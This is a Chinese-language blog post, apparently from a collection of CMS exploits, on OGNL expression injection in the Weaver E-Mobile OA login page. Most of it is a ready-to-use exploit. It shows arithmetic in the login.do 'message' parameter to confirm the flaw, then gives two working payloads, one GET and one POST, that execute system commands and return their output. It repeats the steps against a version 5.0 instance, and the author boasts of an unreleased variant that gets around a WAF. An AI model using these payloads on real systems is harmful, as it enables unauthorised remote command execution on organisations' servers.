泛微e-mobile ognl注入

## 泛微e-mobile ognl注入

泛微 E-Mobile 表达式注入?大概?这个洞是一个月以前,老师丢给我玩的,叫我学习一下。
拿到的时候一脸懵逼,什么是表达式注入?去漏洞库看了一圈。
(・。・) 噢!原来可以执行算术运算就是表达式注入呀!
要怎么玩?当计算器用么?~ヾ(*´∇`)ノ

一、泛微OA E-Mobile WebServer:**Apache** 通用部分:**apache**
官方有两个OA。一个是**apache**的 一个是**Resin**的。
**Resin**的也找到姿势通杀了,但是**Resin**涉及的站太大了。。。暂时不放出来,因为好像和S2撞洞了?因为045打了WAF的 ,我这个可以执行命令。23333 我也不知道~

“`
1、登录页面如下

http://6.6.6.6/login.do?
or
http://6.6.6.6/login/login.do?
“`

“`
2、当账号密码报错的时候,出现如下URL
login.do?message=104&verify=
“`

“`
3、直接改写message=的内容,试试算术运算。
http://6.6.6.6/login.do?message=66*66*66-66666
“`

“`
4、表达式注入。
有的表达式注入是${code}。这里隐藏了${},所以直接调用就行了。
message=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘whoami’).getInputStream())
“`

“`
5、也可以通过`post`提交数据来进行注入,命令执行
`post`如下数据也可以:
message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletResponse”).getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami
“`

====================================================================

网络实例

![图片](/static/baige/01-CMS漏洞/泛微/泛微e-mobile ognl注入/640)

此版本为5.0

首先随便输入账号密码看提示信息

![图片](/static/baige/01-CMS漏洞/泛微/泛微e-mobile ognl注入/640)

提示为104,地址栏message也显示了104,现在测试一下看看有没有注入

直接获取数据法: 加减乘除

表达式获取数据语法:”${标识符}”,但在这个中并不需要${}来包括

“`
http://www.xxx.com/login.do?message=104-2&verify=
“`

![图片](/static/baige/01-CMS漏洞/泛微/泛微e-mobile ognl注入/640)

结果可以被执行成功,表示漏洞存在可注入

这里有两个poc可利用

“`
message=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘whoami’).getInputStream())下面需要Post请求message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletResponse”).getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami
“`

![图片](/static/baige/01-CMS漏洞/泛微/泛微e-mobile ognl注入/640)

![图片](/static/baige/01-CMS漏洞/泛微/泛微e-mobile ognl注入/640)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容